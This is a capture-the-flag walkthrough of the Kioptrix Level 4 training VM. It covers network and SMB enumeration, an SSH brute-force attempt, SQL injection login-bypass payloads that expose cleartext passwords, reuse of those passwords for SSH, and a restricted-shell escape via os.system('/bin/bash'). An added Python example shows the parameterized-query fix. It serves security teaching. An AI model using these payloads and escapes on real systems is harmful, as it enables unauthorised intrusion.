This document is for educational purposes only; I take no responsibility for other people's actions. This is a review of the Kioptrix Level 4 (1.3) vulnerable VM:
http://www.kioptrix.com/dlvm/Kioptrix4_vmware.rar
Host discovery with netdiscover:
Currently scanning: Finished! | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 4 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.180.1 00:50:56:c0:00:08 1 60 VMware, Inc.
192.168.180.2 00:50:56:f9:f6:4a 1 60 VMware, Inc.
192.168.180.136 00:0c:29:08:fb:c7 1 60 VMware, Inc.
192.168.180.254 00:50:56:f4:3f:7c 1 60 VMware, Inc.
nmap -sV -T4 -O -F --version-light 192.168.180.136
Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-05 08:29 EDT
Nmap scan report for 192.168.180.136
Host is up (0.00020s latency).
Not shown: 65 closed ports, 31 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:08:FB:C7 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.62 seconds
nmap -sC -sS -T4 -A -v -v -Pn 192.168.180.136
Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-05 08:31 EDT
NSE: Loaded 132 scripts for scanning.
<omitted>
Host is up, received arp-response (0.00021s latency).
Scanned at 2016-07-05 08:31:51 EDT for 33s
Not shown: 566 closed ports, 430 filtered ports
Reason: 566 resets and 430 no-responses
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
| ssh-dss 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
| 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApA/UX2iq4JYXncTEDfBoyJWguuDkWDvyw4HlLyc1UBT3Pn2wnYLYa0MjwkBtPilmf5X1zK1z3su7oBEcSEt6o7RzDEUbC1O6nRvY4oSKwBD0qLaIHM1V5CZ+YDtLneY6IriJjHJ0DgNyXalPbQ36VZgu20o9dH8ItDkjlZTxRHPE6RnPiD1aZSLo452LNU3N+/2M/ny7QMvIyPNkcojeZQWS7RRSDa2lEUw1X1ECL6zCMiWC0lhciZf5ieum9MnATTF3dgk4BnCq6dfdEvae0avSypMcs6no2CJ2j9PPoAQ1VWj/WlAZzEbfna9YQ2cx8sW/W/9GfKA5SuLFt1u0iQ==
80/tcp open http syn-ack ttl 64 Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X (workgroup: WORKGROUP)
MAC Address: 00:0C:29:08:FB:C7 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
TCP/IP fingerprint:
OS:SCAN(V=7.01%E=4%D=7/5%OT=22%CT=1%CU=33742%PV=Y%DS=1%DC=D%G=Y%M=000C29%TM
OS:=577BA8D8%P=i586-pc-linux-gnu)SEQ(SP=C8%GCD=1%ISR=CF%TI=Z%CI=Z%II=I%TS=7
OS:)OPS(O1=M5B4ST11NW6%O2=M5B4ST11NW6%O3=M5B4NNT11NW6%O4=M5B4ST11NW6%O5=M5B
OS:4ST11NW6%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0
OS:)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW6%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+
OS:%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11NW6
OS:%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN
OS:=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 0.004 days (since Tue Jul 5 08:27:17 2016)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=200 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| KIOPTRIX4<00> Flags: <unique><active>
| KIOPTRIX4<03> Flags: <unique><active>
| KIOPTRIX4<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 51861/tcp): CLEAN (Couldn't connect)
| Check 2 (port 63161/tcp): CLEAN (Couldn't connect)
| Check 3 (port 12408/udp): CLEAN (Failed to receive data)
| Check 4 (port 10447/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2016-07-05T11:32:22-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 0.21 ms 192.168.180.136
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:32
Completed NSE at 08:32, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:32
Completed NSE at 08:32, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.71 seconds
Raw packets sent: 1450 (64.546KB) | Rcvd: 586 (24.154KB)
nmap -sC -sU -T4 -A -v -v -Pn --top-ports 200 192.168.180.136
Starting Nmap 7.01 ( https://nmap.org ) at 2016-07-05 08:34 EDT
<omitted: large amount of output>
Scanned at 2016-07-05 08:34:11 EDT for 1193s
Not shown: 954 closed ports
Reason: 954 port-unreaches
PORT STATE SERVICE REASON VERSION
<omitted>
137/udp open netbios-ns udp-response ttl 64 Microsoft Windows XP netbios-ssn
<omitted>
MAC Address: 00:0C:29:08:FB:C7 (VMware)
Too many fingerprints match this host to give specific OS details
TCP/IP fingerprint:
SCAN(V=7.01%E=4%D=7/5%OT=%CT=%CU=2%PV=Y%DS=1%DC=D%G=N%M=000C29%TM=577BADEC%P=i586-pc-linux-gnu)
SEQ(CI=Z%II=I)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 1 hop
Service Info: Host: KIOPTRIX4; OS: Windows XP; CPE: cpe:/o:microsoft:windows_xp
Host script results:
| nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| KIOPTRIX4<00> Flags: <unique><active>
| KIOPTRIX4<03> Flags: <unique><active>
| KIOPTRIX4<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
TRACEROUTE
HOP RTT ADDRESS
1 0.22 ms 192.168.180.136
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:54
Completed NSE at 08:54, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:54
Completed NSE at 08:54, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1193.64 seconds
Raw packets sent: 1710 (50.767KB) | Rcvd: 1046 (60.396KB)
dirb http://192.168.180.136
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Jul 5 08:57:06 2016
URL_BASE: http://192.168.180.136/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.180.136/ ----
+ http://192.168.180.136/cgi-bin/ (CODE:403|SIZE:330)
==> DIRECTORY: http://192.168.180.136/images/
+ http://192.168.180.136/index (CODE:200|SIZE:1255)
+ http://192.168.180.136/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.180.136/john/
+ http://192.168.180.136/logout (CODE:302|SIZE:0)
+ http://192.168.180.136/member (CODE:302|SIZE:220)
+ http://192.168.180.136/server-status (CODE:403|SIZE:335)
---- Entering directory: http://192.168.180.136/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.180.136/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Jul 5 08:57:07 2016
DOWNLOADED: 4612 - FOUND: 6
-----------------
wfuzz -c -z file,/usr/share/wfuzz/wordlist/general/big.txt --hc 404 http://192.168.180.136/FUZZ
********************************************************
* Wfuzz 2.1.3 - The Web Bruteforcer *
********************************************************
Target: http://192.168.180.136/FUZZ
Total requests: 3036
==================================================================
ID Response Lines Word Chars Request
==================================================================
00540: C=403 10 L 33 W 330 Ch "cgi-bin/"
01341: C=200 45 L 94 W 1255 Ch "index"
01349: C=301 9 L 31 W 358 Ch "images"
01609: C=302 0 L 0 W 0 Ch "logout"
01726: C=302 1 L 22 W 220 Ch "member"
01745: C=301 9 L 31 W 356 Ch "john"
02311: C=301 9 L 31 W 358 Ch "robert"
03035: C=404 9 L 35 W 324 Ch "t-bone"
^C
The bigger wordlist turns up /robert/, which dirb's common.txt missed. Together with /john/ that is two directories named after what look like user accounts.
nbtscan 192.168.180.136
Doing NBT name scan for addresses from 192.168.180.136
IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
192.168.180.136 KIOPTRIX4 <server> KIOPTRIX4 00:00:00:00:00:00
root@kali:/# enum4linux -a 192.168.180.136
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jul 5 09:06:47 2016
==========================
| Target Information |
==========================
Target ........... 192.168.180.136
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
=======================================================
| Enumerating Workgroup/Domain on 192.168.180.136 |
=======================================================
[+] Got domain/workgroup name: WORKGROUP
===============================================
| Nbtstat Information for 192.168.180.136 |
===============================================
Looking up status of 192.168.180.136
KIOPTRIX4 <00> - B <ACTIVE> Workstation Service
KIOPTRIX4 <03> - B <ACTIVE> Messenger Service
KIOPTRIX4 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
MAC Address = 00-00-00-00-00-00
========================================
| Session Check on 192.168.180.136 |
========================================
[+] Server 192.168.180.136 allows sessions using username '', password ''
==============================================
| Getting domain SID for 192.168.180.136 |
==============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
=========================================
| OS information on 192.168.180.136 |
=========================================
[+] Got OS info for 192.168.180.136 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
[+] Got OS info for 192.168.180.136 from srvinfo:
KIOPTRIX4 Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
platform_id : 500
os version : 4.9
server type : 0x809a03
================================
| Users on 192.168.180.136 |
================================
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)
user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]
============================================
| Share Enumeration on 192.168.180.136 |
============================================
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))
Server Comment
--------- -------
KIOPTRIX4 Kioptrix4 server (Samba, Ubuntu)
Workgroup Master
--------- -------
---- ----------------
WORKGROUP KIOPTRIX4
[+] Attempting to map shares on 192.168.180.136
//192.168.180.136/print$ Mapping: DENIED, Listing: N/A
//192.168.180.136/IPC$ [E] Can't understand response:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
=======================================================
| Password Policy Information for 192.168.180.136 |
=======================================================
[+] Attaching to 192.168.180.136 using a NULL share
[+] Trying protocol 445/SMB...
[+] Found domain(s):
[+] KIOPTRIX4
[+] Builtin
[+] Password Info for Domain: KIOPTRIX4
[+] Minimum password length: 5
[+] Password history length: None
[+] Maximum password age: Not Set
[+] Password Complexity Flags: 000000
[+] Domain Refuse Password Change: 0
[+] Domain Password Store Cleartext: 0
[+] Domain Password Lockout Admins: 0
[+] Domain Password No Clear Change: 0
[+] Domain Password No Anon Change: 0
[+] Domain Password Complex: 0
[+] Minimum password age: None
[+] Reset Account Lockout Counter: 30 minutes
[+] Locked Account Duration: 30 minutes
[+] Account Lockout Threshold: None
[+] Forced Log off Time: Not Set
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 0
=================================
| Groups on 192.168.180.136 |
=================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
==========================================================================
| Users on 192.168.180.136 via RID cycling (RIDS: 500-550,1000-1050) |
==========================================================================
[I] Found new SID: S-1-5-21-2529228035-991147148-3991031631
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)
[+] Enumerating users using SID S-1-5-21-2529228035-991147148-3991031631 and logon username '', password ''
S-1-5-21-2529228035-991147148-3991031631-500 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-501 KIOPTRIX4\nobody (Local User)
<omitted>
S-1-5-21-2529228035-991147148-3991031631-513 KIOPTRIX4\None (Domain Group)
<omitted>
S-1-5-21-2529228035-991147148-3991031631-1000 KIOPTRIX4\root (Local User)
<omitted>
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
<omitted>
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
<omitted>
================================================
| Getting printer info for 192.168.180.136 |
================================================
No printers returned.
enum4linux complete on Tue Jul 5 09:06:53 2016
root@kali:/# smbclient -N -L 192.168.180.136
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))
Anonymous login successful
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Server Comment
--------- -------
KIOPTRIX4 Kioptrix4 server (Samba, Ubuntu)
Workgroup Master
--------- -------
-----------------------------------------
WORKGROUP KIOPTRIX4
This just wasted my time:
hydra -l loneferret -P darkc0de.lst 192.168.180.136 ssh
So I left it and continued:
http://192.168.180.136/john/
The /john/ and /robert/ directories match two of the usernames enumerated over SMB, so john is a good first username for the site's login form. The password field is injectable; let's try the following as the password:
' OR '1'='1
' OR '1'='1' --
(note the space after the two dashes: MySQL only treats -- as a comment when whitespace follows it, and the comment swallows the closing quote the application appends)
' OR '1'='1' /*
' OR 1=1 #
Each of these turns the WHERE clause into a condition that is always true. The Member's Control Panel then helpfully displays the stored password in clear text:
Member's Control Panel
Username : john
Password : MyNameIsJohn
Repeating the same injection with robert as the username:
Member's Control Panel
Username : robert
Password : ADGAdsafdfwt4gadfga==
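The following is an added example, not code from the Kioptrix 4 VM or from this write-up. It models the login check behind the member panel with an in-memory sqlite3 table: the query built by string concatenation, the way checklogin.php does with its $myusername and $mypassword variables, beside a parameterized version. The members table, its column names and its two rows are constructed here from the credentials recovered above; the real schema is not shown on the page. The ' OR 1=1 # variant is left out because # comments are MySQL-specific and sqlite3 does not accept them.

```python
"""Login bypass with ' OR '1'='1' -- against a concatenated query, and the
same input against a parameterized query. Added example; sqlite3 stands in
for the MySQL 5.0 server on the box so that this runs offline."""
import sqlite3

# Constructed sample data (column names are an assumption; only the two
# recovered passwords come from the write-up).
SEED_ROWS = [
    ("john", "MyNameIsJohn"),
    ("robert", "ADGAdsafdfwt4gadfga=="),
]

# Payload typed into the password field. The trailing space matters on
# MySQL, where "--" is only a comment when whitespace follows it.
PAYLOAD = "' OR '1'='1' -- "


def make_db():
    """Create the members table in memory and seed it."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE members (username TEXT, password TEXT)")
    con.executemany("INSERT INTO members VALUES (?, ?)", SEED_ROWS)
    return con


def vulnerable_login(con, username, password):
    """Concatenated query in the style of checklogin.php.

    With the payload the clause becomes
        WHERE username='john' AND password='' OR '1'='1' -- '
    which parses as (username='john' AND password='') OR TRUE, so every
    row matches and the caller believes the login succeeded. Returns all
    rows the database hands back.
    """
    sql = ("SELECT username, password FROM members "
           f"WHERE username='{username}' AND password='{password}'")
    return con.execute(sql).fetchall()


def safe_login(con, username, password):
    """Parameterized query: the payload is compared as a literal password
    string and matches nothing. Returns the matching row or None."""
    sql = "SELECT username, password FROM members WHERE username=? AND password=?"
    return con.execute(sql, (username, password)).fetchone()


def demo():
    """Run both variants against the payload and a genuine password."""
    con = make_db()
    return {
        "vuln_rows": vulnerable_login(con, "john", PAYLOAD),
        "safe_rows": safe_login(con, "john", PAYLOAD),
        "safe_real": safe_login(con, "john", "MyNameIsJohn"),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The parameterized version is the fix for the bypass; the second problem the panel exposes, storing and displaying passwords in clear text, is only fixed by storing a salted password hash and never returning the column to the browser.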
The SSH password is the same as the web password (password reuse), so let's try:
ssh john@192.168.180.136
The authenticity of host '192.168.180.136 (192.168.180.136)' can't be established.
RSA key fingerprint is SHA256:3fqlLtTAindnY7CGwxoXJ9M2rQF6nn35SFMTVv56lww.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.180.136' (RSA) to the list of known hosts.
john@192.168.180.136's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$
john:~$ sudo su
*** forbidden sudo -> sudo su
cd /
*** forbidden path -> "/"
*** You have 0 warning(s) left, before getting kicked out.
This incident has been reported.
*** forbidden path -> "/"
*** Kicked out
Connection to 192.168.180.136 closed.
Haha, well. Let us try once more. After logging back in, help lists the allowed commands:
john:~$ help
cd clear echo exit help ll lpath ls
The echo built-in is the way out. In this lshell version its argument is handed to the Python interpreter that lshell itself runs in (the python /bin/kshell process in the ps listing further down, with sh -c /bin/bash as its child), so os.system() spawns a bash that is outside the restricted shell entirely:
john:~$ echo os.system('/bin/bash')
john@Kioptrix4:/home/loneferret$ ls -la
total 44
drwxr-xr-x 2 loneferret loneferret 4096 2012-02-06 16:38 .
drwxr-xr-x 5 root root 4096 2012-02-04 18:05 ..
-rw------- 1 loneferret loneferret 62 2012-02-06 20:24 .bash_history
-rw-r--r-- 1 loneferret loneferret 220 2012-02-04 09:58 .bash_logout
-rw-r--r-- 1 loneferret loneferret 2940 2012-02-04 09:58 .bashrc
-rw-r--r-- 1 loneferret loneferret 1 2012-02-05 10:37 .lhistory
-rw------- 1 root root 68 2012-02-04 10:05 .my.cnf.5086
-rw------- 1 root root 1 2012-02-04 10:05 .mysql.5086
-rw------- 1 loneferret loneferret 1 2012-02-05 10:38 .mysql_history
-rw------- 1 loneferret loneferret 9 2012-02-06 16:39 .nano_history
-rw-r--r-- 1 loneferret loneferret 586 2012-02-04 09:58 .profile
-rw-r--r-- 1 loneferret loneferret 0 2012-02-04 10:01 .sudo_as_admin_successful
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
mysql:x:104:108:MySQL Server,,,:/var/lib/mysql:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
loneferret:x:1000:1000:loneferret,,,:/home/loneferret:/bin/bash
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
john@Kioptrix4:/var/www$ uname -a
Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
john@Kioptrix4:/var/www$ cat /etc/debian_version
lenny/sid
john@Kioptrix4:/etc/ssh$ ps -aux
Warning: bad ps syntax, perhaps a bogus '-'? See http://procps.sf.net/faq.html
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.1 2844 1692 ? Ss 11:22 0:01 /sbin/init
root 2 0.0 0.0 0 0 ? S< 11:22 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S< 11:22 0:00 [migration/0]
root 4 0.0 0.0 0 0 ? S< 11:22 0:00 [ksoftirqd/0]
root 5 0.0 0.0 0 0 ? S< 11:22 0:00 [watchdog/0]
root 6 0.0 0.0 0 0 ? S< 11:22 0:00 [events/0]
root 7 0.0 0.0 0 0 ? S< 11:22 0:00 [khelper]
root 41 0.0 0.0 0 0 ? S< 11:22 0:00 [kblockd/0]
root 44 0.0 0.0 0 0 ? S< 11:22 0:00 [kacpid]
root 45 0.0 0.0 0 0 ? S< 11:22 0:00 [kacpi_notify]
root 170 0.0 0.0 0 0 ? S< 11:22 0:00 [kseriod]
root 209 0.0 0.0 0 0 ? S 11:22 0:00 [pdflush]
root 210 0.0 0.0 0 0 ? S 11:22 0:00 [pdflush]
root 211 0.0 0.0 0 0 ? S< 11:22 0:00 [kswapd0]
root 253 0.0 0.0 0 0 ? S< 11:22 0:00 [aio/0]
root 1465 0.0 0.0 0 0 ? S< 11:22 0:00 [ata/0]
root 1468 0.0 0.0 0 0 ? S< 11:22 0:00 [ata_aux]
root 1475 0.0 0.0 0 0 ? S< 11:22 0:00 [scsi_eh_0]
root 1481 0.0 0.0 0 0 ? S< 11:22 0:00 [scsi_eh_1]
root 1494 0.0 0.0 0 0 ? S< 11:22 0:00 [ksuspend_usbd]
root 1499 0.0 0.0 0 0 ? S< 11:22 0:00 [khubd]
root 2362 0.0 0.0 0 0 ? S< 11:22 0:00 [scsi_eh_2]
root 2604 0.0 0.0 0 0 ? S< 11:22 0:00 [kjournald]
root 2772 0.0 0.0 2104 704 ? S<s 11:22 0:00 /sbin/udevd --d
root 3078 0.0 0.0 0 0 ? S< 11:22 0:00 [kgameportd]
root 3216 0.0 0.0 0 0 ? S< 11:22 0:00 [kpsmoused]
root 4540 0.0 0.0 1716 492 tty4 Ss+ 11:22 0:00 /sbin/getty 384
root 4541 0.0 0.0 1716 492 tty5 Ss+ 11:22 0:00 /sbin/getty 384
root 4545 0.0 0.0 1716 492 tty2 Ss+ 11:22 0:00 /sbin/getty 384
root 4546 0.0 0.0 1716 492 tty3 Ss+ 11:22 0:00 /sbin/getty 384
root 4552 0.0 0.0 1716 492 tty6 Ss+ 11:22 0:00 /sbin/getty 384
syslog 4589 0.0 0.0 1936 648 ? Ss 11:22 0:00 /sbin/syslogd -
root 4608 0.0 0.0 1872 540 ? S 11:22 0:00 /bin/dd bs 1 if
klog 4610 0.0 0.1 3160 2048 ? Ss 11:22 0:00 /sbin/klogd -P
root 4629 0.0 0.0 5316 988 ? Ss 11:22 0:01 /usr/sbin/sshd
root 4685 0.0 0.0 1772 524 ? S 11:22 0:00 /bin/sh /usr/bi
root 4727 0.0 1.5 126988 16276 ? Sl 11:22 0:00 /usr/sbin/mysql
root 4729 0.0 0.0 1700 556 ? S 11:22 0:00 logger -p daemo
root 4802 0.0 0.1 6532 1356 ? Ss 11:22 0:00 /usr/sbin/nmbd
root 4804 0.0 0.2 10108 2540 ? Ss 11:22 0:00 /usr/sbin/smbd
root 4818 0.0 0.0 10108 1024 ? S 11:22 0:00 /usr/sbin/smbd
root 4819 0.0 0.1 8084 1340 ? Ss 11:22 0:00 /usr/sbin/winbi
root 4839 0.0 0.1 8208 1704 ? S 11:22 0:00 /usr/sbin/winbi
daemon 4840 0.0 0.0 1984 420 ? Ss 11:22 0:00 /usr/sbin/atd
root 4851 0.0 0.0 2104 884 ? Ss 11:22 0:00 /usr/sbin/cron
root 4873 0.0 0.5 20464 6196 ? Ss 11:22 0:00 /usr/sbin/apach
dhcp 4922 0.0 0.0 2440 764 ? Ss 11:22 0:00 dhclient eth1
root 4929 0.0 0.0 1716 492 tty1 Ss+ 11:22 0:00 /sbin/getty 384
root 4944 0.0 0.0 8084 872 ? S 11:32 0:00 /usr/sbin/winbi
root 4945 0.0 0.1 8092 1264 ? S 11:32 0:00 /usr/sbin/winbi
www-data 5608 0.0 0.3 20464 3276 ? S 13:32 0:00 /usr/sbin/apach
